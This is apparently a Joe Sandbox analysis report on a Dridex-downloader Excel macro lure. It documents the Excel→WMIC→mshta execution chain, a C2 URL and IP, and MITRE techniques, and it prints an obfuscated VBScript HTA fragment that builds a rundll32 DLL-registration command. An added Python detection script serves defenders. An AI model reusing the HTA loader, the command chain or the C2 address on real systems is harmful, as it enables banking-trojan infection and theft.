
Windows Analysis Report: payment 435975469.xlsb

Overview

General Information

Sample Name: payment 435975469.xlsb
Analysis ID: 528046
MD5: 751e07abc0bc08abf349a49fd8c81703
SHA1: ad977311af2765089b9bffb5bb03cb26c6ab874c
SHA256: 595c56c71c91c470c05c6243e46835d1b25b15c247fcd2a025ef0369e6a6b798
Tags: Dridex, xlsb, xlsx

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2840 cmdline: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 3060 cmdline: mshta C:\ProgramData\EYCmMYHJOyR.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Dropped Files

Source | Rule | Description | Author
C:\ProgramData\EYCmMYHJOyR.rtf | JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security

      Sigma Overview

      System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
  Source: Process started
  Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
  Data: Command: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", ProcessId: 2840
Sigma detected: Suspicious WMI Execution
  Source: Process started
  Author: Michael Haag, Florian Roth, juju4, oscd.community
  Data: Command: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", ProcessId: 2840
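Both Sigma hits key on the same event: EXCEL.EXE starting WMIC.exe with `process call create`. The process tree above also shows the detection gap that technique creates: mshta.exe appears with no parent, because a process started through Win32_Process.Create is not a child of WMIC.exe (on real hosts the parent is normally WmiPrvSE.exe), so a rule that only looks for an Office application spawning mshta never fires. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule's code. It implements the Office-to-WMIC condition, then two follow-on checks that do not depend on the broken parent chain: the command handed to Win32_Process.Create names a script host, and mshta.exe is run against a file whose extension is not .hta. The PIDs, images and command lines for 2840 and 3060 are taken from the report; the WmiPrvSE.exe parent of mshta.exe and the two benign events are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Office hosts whose direct children are interesting (lower-cased basenames).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe"}
# Script/loader hosts that get handed to "wmic process call create" so the
# resulting process no longer has the Office application as its parent.
WMI_SPAWNED_LOLBINS = {"mshta", "rundll32", "regsvr32", "powershell", "cmd",
                       "wscript", "cscript", "certutil", "msiexec"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / Security 4688 style)."""
    pid: int
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_wmic_create(ev: ProcessEvent) -> bool:
    """Same condition as the report's Sigma hits: Office parent, WMIC child,
    command line containing 'process', 'call' and 'create'."""
    cl = ev.command_line.lower()
    return (basename(ev.parent_image) in OFFICE_APPS
            and basename(ev.image) == "wmic.exe"
            and all(word in cl for word in ("process", "call", "create")))


def wmic_create_payload(command_line: str):
    """Return the command passed to Win32_Process.Create by a WMIC command line,
    or None when the line is not a 'process call create' invocation."""
    m = re.search(r'process\s+call\s+create\s+"([^"]+)"', command_line, re.IGNORECASE)
    if m is None:
        m = re.search(r'process\s+call\s+create\s+(\S.*)$', command_line, re.IGNORECASE)
    return m.group(1).strip() if m else None


def wmic_create_launches_lolbin(ev: ProcessEvent) -> bool:
    """WMIC used to start a script/loader host, whoever ran WMIC."""
    if basename(ev.image) != "wmic.exe":
        return False
    payload = wmic_create_payload(ev.command_line)
    if not payload:
        return False
    first = basename(payload.split()[0].strip('"'))
    return first.removesuffix(".exe") in WMI_SPAWNED_LOLBINS


def mshta_runs_non_hta(ev: ProcessEvent) -> bool:
    """mshta.exe given something other than an .hta/.htm file: here a .rtf that
    really carries an HTA. Inline javascript:/vbscript: URLs are flagged as well."""
    if basename(ev.image) != "mshta.exe":
        return False
    parts = ev.command_line.split(None, 1)
    if len(parts) < 2:
        return False
    target = parts[1].strip().strip('"').lower()
    return not target.endswith((".hta", ".htm", ".html"))


RULES = {
    "office_spawns_wmic_create": office_spawns_wmic_create,
    "wmic_create_launches_lolbin": wmic_create_launches_lolbin,
    "mshta_runs_non_hta": mshta_runs_non_hta,
}


def evaluate(events):
    """Run every rule over every event; returns [(rule_name, pid), ...]."""
    return [(name, ev.pid) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed events. PIDs, images and command lines of 2840 and 3060 come from
# the report's process tree. The WmiPrvSE.exe parent of mshta.exe is an
# assumption (the report shows no parent); the two benign events are made up.
SAMPLE_EVENTS = [
    ProcessEvent(2840, r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic process call create "mshta C:\\ProgramData\\EYCmMYHJOyR.rtf"',
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"),
    ProcessEvent(3060, r"C:\Windows\System32\mshta.exe",
                 r"mshta C:\ProgramData\EYCmMYHJOyR.rtf",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcessEvent(4100, r"C:\Windows\System32\wbem\WMIC.exe", "wmic os get caption",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(4200, r"C:\Windows\splwow64.exe", "splwow64.exe 12288",
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name:30} pid={pid}")
```

On the constructed events the WMIC launch from Excel trips two rules and the orphaned mshta.exe trips the third, while the administrative `wmic os get caption` and the print-spooler child of Excel stay quiet. The second and third rules are the ones that still fire when the Office parent is missing from telemetry.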

      Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: payment 435975469.xlsb | Virustotal: Detection: 9%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 139.59.64.195:8080 (3 times)
Source: global traffic | HTTP traffic detected:
  GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 139.59.64.195:8080
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 139.59.64.195
Source: unknown | TCP traffic detected without corresponding DNS query: 139.59.64.195 (5 times)
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.466155130.0000000001B90000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70DEA7D3.png
Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Dridex Downloader
Source: Yara match | File source: C:\ProgramData\EYCmMYHJOyR.rtf, type: DROPPED

System Summary:

Found Excel 4.0 Macro with suspicious formulas
Source: payment 435975469.xlsb | Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: payment 435975469.xlsb | Initial sample: Sheet name: Macro1
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000002.00000002.466036264.0000000000270000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaulto
Found obfuscated Excel 4.0 Macro
Source: payment 435975469.xlsb | Macro extractor: Sheet: Macro1 high usage of CHAR() function: 56
Source: payment 435975469.xlsb | Macro extractor: Sheet name: Macro1
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: payment 435975469.xlsb | Virustotal: Detection: 9%
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\EYCmMYHJOyR.rtf
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$payment 435975469.xlsb
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRF24A.tmp
Source: classification engine | Classification label: mal92.troj.expl.evad.winXLSB@4/7@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK (2 times)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: payment 435975469.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
Source: payment 435975469.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
Source: payment 435975469.xlsb | Initial sample: OLE zip file path = docProps/custom.xml
Source: 57FF.tmp.0.dr | Initial sample: OLE zip file path = xl/media/image1.png
Source: 57FF.tmp.0.dr | Initial sample: OLE zip file path = xl/media/image2.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: cmd line: eycmmyhjoyr.rtf
Source: unknown | Process created: cmd line: eycmmyhjoyr.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (11 times)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: FAILCRITICALERRORS|NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX (3 times)
Source: C:\Windows\System32\wbem\WMIC.exe TID: 1936 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 760 | Thread sleep time: -60000s >= -30000s
Source: Yara match | File source: app.xml, type: SAMPLE
Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (2 times)
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Techniques per tactic. The number after a technique is the hit counter shown in the original matrix; techniques without a number are the matrix's unhit placeholder entries.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation (21); Scripting (3); Exploitation for Client Execution (32); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection (2); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (2); Scripting (3)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (15)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Email Collection (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Standard Port (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

[behavior graph image: not included in this extract]

Screenshots

[screenshot thumbnails: not included in this extract]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
payment 435975469.xlsb | 10% | Virustotal | (none)
payment 435975469.xlsb | 9% | ReversingLabs | Script-WScript.Malware.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG | false | Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | false | (none) | high
http://www.windows.com/pctv. | mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | false | (none) | high
http://investor.msn.com | mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | false | (none) | high
http://www.msnbc.com/news/ticker.txt | mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | false | (none) | high
http://www.%s.comPA | mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.icra.org/vocabulary/. | mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmp | false | (none) | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | false | (none) | high
http://servername/isapibackend.dll | WMIC.exe, 00000002.00000002.466155130.0000000001B90000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://investor.msn.com/ | mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmp | false | (none) | high

                    Contacted IPs


                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
139.59.64.195 | unknown | Singapore | 14061 | DIGITALOCEAN-ASN, US | false

                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528046
Start date: 24.11.2021
Start time: 17:49:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: payment 435975469.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.expl.evad.winXLSB@4/7@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active AutoShape Object
• Active Picture Object
• Active Picture Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

Time | Type | Description
17:49:45 | API Interceptor | 11x Sleep call for process: WMIC.exe modified
17:49:46 | API Interceptor | 443x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

Match: 139.59.64.195
Associated sample (detection): contacted URL
• _2070731.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• _2070731.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• tax payment12248998.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• promo details-747242.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• tax payment12248998.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• promo details-747242.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• Netflix-54850.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• Netflix-54850.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• request477360122.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• salecoupon05894.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• request477360122.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• salecoupon05894.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• subscription60547.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• subscription60547.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• 007422621.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• 007422621.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• promo details 0396729.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• promo details 0396729.xlsb (malicious): 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• Rooms_requirement.3692.xlsb (malicious): 139.59.64.195:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
• Booking-6880.xlsb (malicious): 139.59.64.195:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA

                    Domains

                    No context

                    ASN

Match: DIGITALOCEAN-ASN, US
Associated sample (detection): contacted IP
• _2070731.xlsb (malicious): 139.59.64.195
• _2070731.xlsb (malicious): 139.59.64.195
• jPzSCuyellowfacebrownietacohead.dll (malicious): 107.170.4.227
• tax payment12248998.xlsb (malicious): 139.59.64.195
• promo details-747242.xlsb (malicious): 139.59.64.195
• tax payment12248998.xlsb (malicious): 139.59.64.195
• promo details-747242.xlsb (malicious): 139.59.64.195
• Netflix-54850.xlsb (malicious): 139.59.64.195
• Netflix-54850.xlsb (malicious): 139.59.64.195
• VREcGZRvOYEWbeanerwopnigga.dll (malicious): 107.170.4.227
• sjAPKtporrJZCRbeanerwopnigga.dll (malicious): 107.170.4.227
• request477360122.xlsb (malicious): 139.59.64.195
• salecoupon05894.xlsb (malicious): 139.59.64.195
• VREcGZRvOYEWbeanerwopnigga.dll (malicious): 107.170.4.227
• sjAPKtporrJZCRbeanerwopnigga.dll (malicious): 107.170.4.227
• request477360122.xlsb (malicious): 139.59.64.195
• salecoupon05894.xlsb (malicious): 139.59.64.195
• request-038477145.xlsb (malicious): 157.245.108.215
• request-038477145.xlsb (malicious): 157.245.108.215
• subscription60547.xlsb (malicious): 139.59.64.195

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

C:\ProgramData\EYCmMYHJOyR.rtf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 4615
Entropy (8bit): 5.0608578290611925
Encrypted: false
SSDEEP: 96:8B+NjARKVHzys6CdZ2HicZoKDnBkMhRqDM3L7tZU8p4Z:8BEjAaTy9GZ2CcZHDnBhADMXC
MD5: 917B40E35B587030F8B8733E7067F38C
SHA1: E133A85BDC74026801998A417F1998FE5CE9E583
SHA-256: 644610D43C88A544C046A8EC4D4E1D959B7A547D291482C584CBCC94958326EE
SHA-512: 71BEDA5B416C82BAD9390253B5AB879C63DDE3A27498B61081DAEBEC8F134F2086794ED23613938C25D469F4E1871034C377611AD878B6E4A8583CA1183184E6
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\EYCmMYHJOyR.rtf, Author: Joe Security
Reputation: low
Preview (CRLF line breaks restored; the last line is truncated in the report):
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="ttrgnkrtegjtjgjerg"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">
<script type="text/vbscript" LANGUAGE="VBScript" >
b_O_x_v_m_y_N_V_Y_i_J_b_r_e_a_f_U = Chr(114+1-1) & "und" & "ll3" & "2." & Chr(101+1-1) & "" & "xe " & "C:\" & "" & "" & "\Pr" & "ogr" & "amD" & "ata" & "\l" & Chr(119+1-1) & "nig" & "ge" & "r." & "bi" & "n " & "Dll" & Chr(82+1-1) & Chr(101+1-1) & Chr(103+1-1) & Chr(105+1-1) & "st" & "" & "erS" & "erv" & "er"
